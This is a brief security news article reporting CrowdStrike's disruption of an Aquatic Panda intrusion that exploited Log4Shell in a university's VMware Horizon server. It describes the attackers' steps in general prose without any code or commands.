China-linked cyber-espionage group known as Aquatic Panda has been recently spotted exploiting the Log4Shell vulnerability to break into a large academic institution.
According to the latest report from CrowdStrike’s Falcon OverWatch team, the adversary used a modified version of the Log4Shell exploit (initially published on GitHub on December 13) in order to gain access to the instance of VMware Horizon that employed the vulnerable Log4j library at an unnamed academic institution.
The purpose of the attack is unknown because the intrusion was thwarted.
“OverWatch uncovered suspicious activity stemming from a Tomcat process running under a vulnerable VMware Horizon instance at a large academic institution, leading to the disruption of an active hands-on intrusion,” the team said.
The threat actor performed connectivity checks via DNS lookups for a subdomain executed under the Apache Tomcat service running on the VMware Horizon instance. The attackers then executed a series of Linux commands on a Windows host under the Apache Tomcat service to retrieve additional tools hosted on remote infrastructure.
Aquatic Panda performed reconnaissance from the host to better understand current privilege levels and system and domain details. The adversary also attempted to discover and stop a third-party endpoint detection and response (EDR) service.
The hackers then downloaded additional scripts and executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. The OverWatch team also observed multiple attempts at credential harvesting. The threat actor used winRAR to compress the memory dump in preparation for exfiltration and deleted all executables from the ProgramData and Windows\temp\ directories to cover their tracks.
“Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host,” CrowdStrike said.